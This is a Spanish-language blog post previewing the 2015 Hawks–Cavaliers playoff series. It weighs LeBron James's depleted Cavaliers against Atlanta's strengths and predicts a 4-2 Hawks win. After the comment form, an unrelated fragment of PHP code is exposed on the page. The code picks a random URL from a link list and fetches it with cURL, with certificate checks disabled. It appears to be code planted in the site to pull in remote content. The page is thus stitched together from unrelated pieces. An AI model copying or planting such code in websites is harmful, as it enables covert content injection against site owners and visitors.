Previa Hawks-Cavs

20 de May de 2015 por TheDeerHunter

En ningún otro ámbito King James ha hecho honor a su nombre como en de la conferencia Este. Desde el 2006 se ha sentado en su trono nada menos que en 5 ocasiones, quedándose en la final una vez y alcanzando las semifinales 4 veces más, incluyendo la que nos ocupa. Caer eliminado supondría igualar sus peores resultados desde entonces. Casi inimaginable. Es lógico que los Cavs sean favoritos atendiendo exclusivamente a su presencia.

Los Hawks conocen bien al Elegido. La última vez que se cruzaron con él salieron esquilados con un 4-0 debajo del brazo. Cierto es que poco queda de aquel equipo plano que dirigía Mike Woodson en el 2009. Los actuales Hawks han firmado la mejor regular de su historia, donde le endosaron un 3-1 a sus próximos rivales. En playoffs, sin embargo, hemos visto una versión que nos recuerda mucho a antaño, pero en lo malo. Apenas en ningún momento hemos llegado a apreciar un nivel digno de aspirar al anillo.

Por el contrario LeBron James no ha hecho más que mejorar desde aquel que destrozó a los Hawks en 2009. En el punto por encima del bien y del mal que se encuentra ha dado la sensación de centrarse exclusivamente en crear equipo para este novedoso proyecto que encabeza. Lo malo es que las bajas de Love y Varejao son irreparables, así como los posibles problemas físicos de Kyrie Irving. El nuevo Big Three de LeBron se presenta en peores condiciones que el que abandonó. Llega a este momento con los peores mimbres que ha disfrutado desde las eliminatorias menos ventajosas con sus anteriores Cavaliers.

Podemos haberlo olvidado pero los Hawks tienen bastantes recursos para hacer daño. Para empezar tienen a DeMarre Carroll, quien, además de llegar en un excelente estado de forma, ha sido uno de los mejores defensores con los que se ha cruzado LeBron este curso, por no decir el mejor y el que más problemas le ha provocado. En este sentido sí puede notarse la ausencia de Sefolosha. Segundo, un juego interior potente, quizá el más potente de la conferencia, que necesariamente va a causar dificultades a los hombres grandes de los Cavaliers. Adicionalmente tienen un puñal en Jeff Teague, al que Irving (especialmente lesionado) y Dellavedova, por sus características, no pueden ni soñar parar. Tenemos en mente el juego de pase y la artillería exterior de los Hawks, pero la mayor parte de desequilibrios se generan tras penetraciones de Teague, y fue Wall en buena medida el que colapsó el juego de los de Budenholzer en la pasada serie. Por si fuera poco, Kyle Korver tampoco va a sufrir ni parecido como contra Beal y Porter con las consecuencias que todos podemos imaginar.

Por su lado las bazas con las que cuenta David Blatt son casi exclusivamente los balones a LeBron… y todos los conejos que de la chistera pueden salir a su alrededor. Ya hemos visto excelentes actuaciones de Iman Shumpert o Dellavedova. No deberían extrañar otras de J.R. Smith, Thompson o Mozgov. Será vital que Irving sea de la partida, aunque sea mermado. Veremos si la gran defensa que han mostrado la segunda mitad del curso es capaz de generar dudas en sus rivales. En un intercambio de triples los Cavs difícilmente saldrán bien parados.

Alguna vez sugerí que “no se debe apostar contra un dios” y no cabe duda que LeBron es lo más parecido hoy en día. Cometo una temeridad, pero para mí será una sorpresa si estos mermados Cavs alcanzan la final del campeonato. 4-2 para Hawks.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>